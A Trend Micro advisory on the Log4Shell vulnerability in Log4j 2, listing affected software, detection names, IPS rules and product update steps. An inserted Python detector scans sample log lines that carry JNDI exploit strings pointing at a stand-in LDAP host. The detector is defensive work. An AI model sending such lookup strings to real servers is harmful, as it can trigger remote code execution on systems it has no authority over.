Log4Shell Malware Information

    • Updated:
    • 13 Dec 2021
    • Product/Version:
    • Apex One 2019
    • Cloud App Security
    • Cloud One - Application Security
    • Cloud One - Container Security
    • Cloud One - File Storage Security
    • Deep Discovery Email Inspector
    • Deep Discovery Inspector
    • Deep Security
    • Hosted Email Security
    • InterScan Messaging Security Suite
    • Interscan Web Security Virtual Appliance
    • ScanMail for Exchange
    • Trend Micro Email Security
    • Worry-Free Business Security Advanced
    • Worry-Free Business Security Standard
    • Platform:
Summary

On December 9, 2021, a new critical 0-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed that, if exploited, could result in Remote Code Execution (RCE) by logging a certain string on affected installations.

This specific vulnerability has been assigned CVE-2021-44228 and is also being commonly referred to as "Log4Shell" in various blogs and reports.

CVE-2021-44228 is a Java Naming and Directory Interface (JNDI) injection vulnerability in the affected versions of Log4j 2. It can be triggered when a system using an affected version of Log4j 2 includes untrusted data in a logged message. If this data includes a crafted malicious payload, a JNDI lookup is made to a malicious server. Depending on the response sent back, a malicious Java object may be loaded, which could eventually lead to RCE. Additionally, attackers who can control log messages or their parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

AFFECTED SOFTWARE

  • Apache Struts
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • ElasticSearch
  • Flume
  • Apache Dubbo
  • Logstash
  • Kafka
  • Spring-Boot-starter-log4j2

INFECTION ROUTINE

Log4Shell Threat Advisory - Infection Routine

AVAILABLE SOLUTIONS

File Reputation

Detection/Policy/Rules        Pattern Branch/Version   Release Date
Trojan.Linux.MIRAI.SEMR       17.247.00                12 Dec 2021
Backdoor.Linux.MIRAI.SMF      17.247.00                12 Dec 2021
Backdoor.Linux.MIRAI.SME      17.247.00                12 Dec 2021
Trojan.SH.CVE20207961.SM      17.247.00                13 Dec 2021
Backdoor.Linux.MIRAI.SEMR     17.248.04                13 Dec 2021
Trojan.SH.MIRAI.MKF           17.248.04                13 Dec 2021
Coinminer.Linux.KINSING.D     17.248.04                13 Dec 2021

Predictive Machine Learning

Detection                     Pattern Branch/Version
Troj.ELF.TRX.XXELFC1DFF009    In-the-cloud
Troj.ELF.TRX.XXELFC1DFF012    In-the-cloud

Behavior Monitoring

Pattern Branch/Version        Release Date
SEN5985S / TMTD 2565          12 Dec 2021

Web Reputation

URL                                        Category             Blocking Date
URL Protection (Over 1700 URLs blocked)    Malware Accomplice   In-the-cloud

NETWORK PATTERN

Trend Micro Cloud One - Workload Security and Deep Security IPS Rules

  • Rule 1011242 - Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
  • Rule 1005177 - Restrict Java Bytecode File (Jar/Class) Download
  • Rule 1008610 - Block Object-Graph Navigation Language (OGNL) Expressions Initiation In Apache Struts HTTP Request

Trend Micro Cloud One - Workload Security and Deep Security Log Inspection

  • LI Rule 1011241 - Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

Trend Micro Cloud One - Network Security and TippingPoint DVToolkit CSW file CVE-2021-44228

  • Filter C1000001 : HTTP: JNDI Injection in HTTP Header or URI

Trend Micro Deep Discovery Inspector

  • Proactive Detection:
    • DDI Rule 4280: "HTTP_POSSIBLE_USERAGENT_RCE_EXPLOIT_REQUEST"
  • Protection Solutions:
    • Released in NCIP 1.14747.00:
      • DDI Rule 4641: "CVE-2021-44228 - OGNL EXPLOIT - HTTP(REQUEST)"
      • DDI Rule 4643: "POSSIBLE HTTP BODY OGNL EXPRESSION EXPLOIT - HTTP (REQUEST) - Variant 2" (disabled by default)
    • Released in NCIP 1.14749.00:
      • DDI Rule 4642: "POSSIBLE HTTP HEADER OGNL EXPRESSION EXPLOIT - HTTP(REQUEST)"
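The Log Inspection rule and the "JNDI Injection in HTTP Header or URI" filter above both look for the lookup string the Summary describes arriving in logged request data. The following is an added example, not Trend Micro's rule logic: a small Python detector that URL-decodes constructed web-server access log lines and flags any that carry a `${jndi:` lookup in the URI or User-Agent. The log lines and the `placeholder.example` host are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines (not from the article): one benign request,
# one with the lookup string in the User-Agent header, one percent-encoded in the URI.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [12/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://placeholder.example/x}"',
    '10.0.0.7 - - [12/Dec/2021:10:01:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fplaceholder.example%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# The lookup begins with "${jndi:"; match case-insensitively on the decoded text.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(line: str) -> str:
    """URL-decode repeatedly (bounded) so a percent-encoded lookup becomes visible."""
    for _ in range(3):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def find_jndi_lookups(lines):
    """Return (line index, decoded lookup text) for each line carrying a JNDI lookup."""
    hits = []
    for i, raw in enumerate(lines):
        text = normalize(raw)
        m = JNDI_LOOKUP.search(text)
        if m is None:
            continue
        end = text.find("}", m.start())
        stop = end + 1 if end != -1 else len(text)
        hits.append((i, text[m.start():stop]))
    return hits


if __name__ == "__main__":
    for idx, lookup in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {idx}: JNDI lookup in logged request data: {lookup}")
```

Lines 1 and 2 are flagged; a hit on a real server is a reason to check whether the receiving application logs that field through an unpatched Log4j 2 and to apply the patterns and rules in this article.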
Details

Solution Map - What should customers do?

Trend Micro Solutions | Major Products | Latest Versions | Virus Pattern | Anti-Spam Pattern | Network Pattern | Behavior Monitoring | Predictive Machine Learning | Web Reputation
Endpoint Security | Apex One | 2019 (Critical Patch - Server Build 9204 and Agent Build 9179) | Update pattern via web console | Not Applicable | Update pattern via web console | Enable Behavior Monitoring and update pattern via web console | Enable Predictive Machine Learning | Enable Web Reputation Service and update pattern via web console
Endpoint Security | Worry-Free Business Security | Standard (10.0), Advanced (10.0) | Update pattern via web console | | | | |
Hybrid Cloud Security | Deep Security | 20.0 | Update pattern via web console | Not Applicable | Update pattern via web console | Enable Behavior Monitoring and update pattern via web console | Enable Predictive Machine Learning | Enable Web Reputation Service and update pattern via web console
Hybrid Cloud Security | Cloud One - File Storage Security (SaaS) | N/A | Updated Automatically | Not Applicable | Not Applicable | Not Applicable | Not Applicable |
Hybrid Cloud Security | Cloud One - Application Security (SaaS) | | Updated automatically | | | | |
Hybrid Cloud Security | Cloud One - Container Security (SaaS) | | Not applicable | | | | |
Email and Gateway Security | Deep Discovery Email Inspector | 5.1 | Update pattern via web console | Update pattern via web console | Update pattern via web console | Not Applicable | Enable Predictive Machine Learning | Enable Web Reputation Service and update pattern via web console
Email and Gateway Security | InterScan Messaging Security | 9.1 | Not Applicable | Not Applicable | | | |
Email and Gateway Security | InterScan Web Security / InterScan Web Security Virtual Appliance | 6.5 | | | | | |
Email and Gateway Security | ScanMail for Microsoft Exchange | 14.0 | | | | | |
Email and Gateway Security | Cloud App Security (SaaS) | N/A | Updated Automatically | Updated Automatically | Enable Predictive Machine Learning | | |
Email and Gateway Security | Hosted Email Security (SaaS) | | | | | | |
Email and Gateway Security | Email Security (SaaS) | | | | | | |
Network Security | Deep Discovery Inspector | 5.8 | Update pattern via web console | Not Applicable | Update pattern via web console | Not Applicable | Not Applicable | Enable Web Reputation Service and update pattern via web console

Cells left empty above were not present in the source table for that row.

To update Trend Micro products, refer to the Online Help Center.

Recommendations

Threat Reports

Other Information

Category: Remove a Malware / Virus
Solution Id: 000289946